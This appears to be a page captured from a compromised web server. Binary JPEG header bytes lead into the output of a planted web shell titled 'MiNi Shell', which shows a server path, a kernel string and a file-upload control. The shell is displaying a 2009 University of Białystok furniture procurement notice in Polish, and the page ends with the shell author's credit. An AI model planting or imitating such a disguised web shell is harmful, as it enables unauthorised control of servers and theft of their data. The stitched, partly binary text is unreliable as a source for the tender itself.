JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/51973-N-2009.html

<p class="kh_header"><b>Białystok: Dostawa  wraz z montażem mebli dla jednostek Uniwersytetu w Białymstoku - Dzp-07/D/2009</b><br>
<b>Numer ogłoszenia: 51973 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet w Białymstoku , ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, woj. podlaskie, tel. 085 7457117, faks 085 745 70 73.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  wraz z montażem mebli dla jednostek Uniwersytetu w Białymstoku - Dzp-07/D/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest dostawa mebli tj. fotele obrotowe, szafy na dokumenty, regały, biurka, krzesła itp. w ilościach i wymaganiach zgodnie z zał. nr 1 do SIWZ Opis przedmiotu zamówienia
Zakres zamówienia poniżej 206 000 tys. euro..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.11.00-4, 39.11.20.00-0, 39.12.11.00-7, 39.13.00.00-2, 39.13.21.00-7, 39.13.41.00-1, 39.13.40.00-0, 39.11.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą się ubiegać Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 uPzp,
      a w szczególności:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi 
do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 
- w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali min. 2 zamówienia, odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, określonej jako możliwość dysponowania lub dostępu do środków finansowych wystarczających do realizacji zamówienia bez udzielania zaliczki, 
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Sposób oceny spełniania warunków:
Ocena spełniania warunków dokonana zostanie w oparciu o informacje zawarte w dokumentach i oświadczeniach, 
o których mowa w pkt 6 SIWZ, dołączonych do oferty wg formuły spełnia - nie spełnia. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki. Uzupełnienie wymaganych dokumentów będzie możliwe po upływie terminu składania ofert, chyba że mimo ich uzupełnienia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. W przypadku wątpliwości co do treści dokumentów złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału 
w postępowaniu, Zamawiający może wezwać Wykonawców w określonym przez siebie terminie do złożenia wyjaśnień. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu, nie później niż w dniu, w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> OŚWIADCZENIA:
1)	oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 1-3 uPzp (wg załączonego wzoru druku - zał. nr 4 do SIWZ), 
2)	oświadczenie, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 uPzp (wg załączonego wzoru druku - zał. nr 5 do SIWZ), 
DOKUMENTY:
1)	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 uPzp, Zamawiający żąda złożenia:
-  aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy 
i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Zamawiający żąda:
- wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw 
   w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres 
   prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom
   stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz 
   załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie - wg załączonego wzoru  
   druku - zał. nr 7do SIWZ.
Uwaga: Zamawiający uzna za dostawę odpowiadającą swoim rodzajem i wartością przedmiotowi zamówienia, dostawę wykonaną dla jednego zleceniodawcy, polegającą na dostawie mebli o wartości nie mniejszej niż: 
dla zadania 1, 2, 5, 6, 7: 5 000 PLN; dla zadania 3, 4, 9: 15 000 PLN; dla zadania 8: 2 000 PLN,
a w przypadku składania oferty na kilka zadań, na kwotę odpowiadającą maksymalnej wartości tego zadania, którego wartość jest najwyższa, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz 
z załączeniem dokumentów potwierdzających, że zamówienia te zostały zrealizowane należycie.
3)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 6 DOKUMENTY ppkt 1 składa dokument lub dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
4)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania 
nie wydaje się dokumentu lub dokumentów potwierdzających odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5)	Wykonawca składa wszystkie dokumenty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
6)	Wykonawca składa wszystkie dokumenty sporządzone w języku obcym wraz z tłumaczeniem na język polski, tłumaczenie musi być poświadczone przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uwb.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet w Białymstoku, Dział Zamówień Publicznych ul. M. Skłodowskiej - Curie 14, 15-097 Białystok, piętro V, p. 503..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 09:30, miejsce: Uniwersytet w Białymstoku, Kancelaria Ogólna, ul. M. Skłodowskiej-Curie 14, 15-097 Białystok, piętro X, p. 1008..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż mebli dla administracji centralnej Uniwersytetu w Białymstoku przy ul. M. Skłodowskiej
 - Curie 14 w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla administracji centralnej Uniwersytetu w Białymstoku w ilościach:fotele obrotowe - 30 szt., krzesła - 25 szt. - zgodnie z wymaganiami określonymi w zał. nr 1 do SIWZ Opis przedmiotu zamówienia
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.11.00-4, 39.11.20.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż mebli dla Wydziału Pedagogiki i Psychologii Uniwersytetu
		       w Białymstoku przy ul. Świerkowej 20 w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Wydziału Pedagogiki i Psychologii Uniwersytetu w Białymstoku w ilościach: 
biurka - 2 szt., stoły - 3 szt., krzesła - 14 szt., fotele obrotowe - 6szt., regały - 11 szt., szafy - 3 szt. - zgodnie
 z wymaganiami określonymi w zał. nr 1 do SIWZ Opis przedmiotu zamówienia
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.11.00-4, 39.11.20.00-0, 39.12.11.00-7, 39.13.00.00-2, 39.13.21.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa i montaż mebli dla Wydziału Ekonomii i Zarządzania Uniwersytetu
                                                       w Białymstoku przy ul. Warszawskiej 63 w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Wydziału Ekonomii i Zarządzania Uniwersytetu w Białymstoku w ilościach:
 fotel gabinetowy - 1 szt., kontener - 1 szt., biurko - 1 szt., regały biblioteczne - 25 szt. - zgodnie z wymaganiami określonymi w zał. nr 1 do SIWZ Opis przedmiotu zamówienia
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-3, 39.11.11.00-4, 39.12.11.00-7, 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa i montaż mebli dla Wydziału Prawa Uniwersytetu w Białymstoku 
		        przy ul. Mickiewicza 1 w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Wydziału Prawa Uniwersytetu w Białymstoku w ilościach: 
fotele obrotowe - 4 szt., fotele - 3 szt., regały - 16 szt., szafy - 13 szt., stoliki - 2 szt., biurka - 7 szt., 
kontenery - 2 szt., krzesła obrotowe - 9 szt., krzesła stacjonarne - 8 szt., stół konferencyjny - 1 szt., 
obudowa grzejnika - 2 szt., gablota ekspozycyjna - 2 szt., listwa ochronna  - 1 szt. - zgodnie z wymaganiami określonymi w zał. nr 1 do SIWZ  Opis przedmiotu zamówienia
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.00.00-4, 39.11.20.00-0, 39.12.11.00-7, 39.13.00.00-2, 39.13.21.00-7, 30.13.40.00-0, 39.11.30.00-7, 39.13.41.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa i montaż mebli dla Wydziału Historyczno - Socjologicznego Uniwersytetu
	                    w  Białymstoku przy Pl. Uniwersyteckim 1 w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Wydziału Historyczno - Socjologicznego Uniwersytetu w Białymstoku w ilościach:
biurka - 4 szt., szafki - 7 szt., regały - 5 szt., słupek z trzech szafek - 1 szt., stoły - 2 szt., stół komputerowy 
- 1 szt., biblioteczka przeszklona - 1 szt., wieszak ubraniowy - 1 szt., wózek pod komputer - 1 szt., krzesło stacjonarne - 10 szt., krzesła obrotowe- 3 szt. - zgodnie z wymaganiami określonymi w zał. nr 1 do SIWZ Opis przedmiotu zamówienia
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.11.00-4, 39.11.20.00-0, 39.13.00.00-2, 39.11.30.00-7, 39.12.11.00-7, 39.13.41.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa i montaż mebli dla Wydziału Filologicznego Uniwersytetu w  Białymstoku
                                             przy Pl. Uniwersyteckim 1 w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Wydziału Filologicznego Uniwersytetu w Białymstoku w ilościach:
    stolik pod komputer - 1 szt., stół - 1 szt., szafy - 5 szt., stolik - 1 szt., biurko - 1 szt., biblioteczka przeszklona - 1 szt., krzesło obrotowe - 1 szt., krzesła stacjonarne - 8 szt., regały - 2 szt. - zgodnie z wymaganiami określonymi w zał. nr 1 do SIWZ Opis przedmiotu zamówienia 
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.11.00-4, 39.11.20.00-0, 39.13.00.00-2, 39.11.30.00-7, 39.12.11.00-7, 39.13.41.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa i montaż mebli dla Studium Wychowania Fizycznego i Sportu 
                                                           Uniwersytetu w  Białymstoku przy ul. Świerkowej 20 A w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Studium Wychowania Fizycznego i Sportu UwB w ilościach:
    siedziska 2 - osobowe - 2 szt., 6 -osobowe - 1 szt., 4 - osobowe - 1szt., Solik - 2 szt.  - zgodnie z wymaganiami określonymi w zał. nr 1 do SIWZ Opis przedmiotu zamówienia
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa i montaż mebli dla Wydziału Biologiczno - Chemicznego (Instytutu
		    Biologii - Zakładu Hydrobiologii) Uniwersytetu w Białymstoku przy 
		    ul. Świerkowej 20B Uniwersytetu w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Wydziału Biologiczno - Chemicznego (Instytutu Biologii- Zakładu Hydrobiologii) Uniwersytetu w Białymstoku w ilościach:
    fotele obrotowe - 4 szt., wersalka - 1 szt., krzesła składane - 16 szt., fotele rozkładane - 2 szt., szafki wiszące
 - 4 szt.  - zgodnie z wymaganiami określonymi w zał. nr 1 do SIWZ Opis przedmiotu zamówienia
Zakres zamówienia poniżej 206 000 tysięcy euro..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.11.00-4, 39.11.20.00-0, 39.11.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa i montaż mebli dla Wydziału Informatyki i Matematyki Uniwersytetu 
                                                  w Białymstoku przy ul. Sosnowej 64 w Białymstoku..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż mebli dla Wydziału Informatyki i Matematyki Uniwersytetu w Białymstoku w ilościach:
    regały - 20 szt., stoły - 12 szt., biurka - 2 szt., krzesła stacjonarne - 24 szt., krzesła obrotowe  - 2 szt.,
 szafy - 1 szt., stoły szkolne - 13 szt., krzesła szkolne - 25 szt.  - zgodnie z wymaganiami określonymi
 w zał. nr 1 do SIWZ Opis przedmiotu zamówienia
zakres zamówienia poniżej 206 000 tys. euro.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.11.00-4, 39.11.20.00-0, 39.12.11.00-7, 39.13.00.00-2, 39.13.21.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com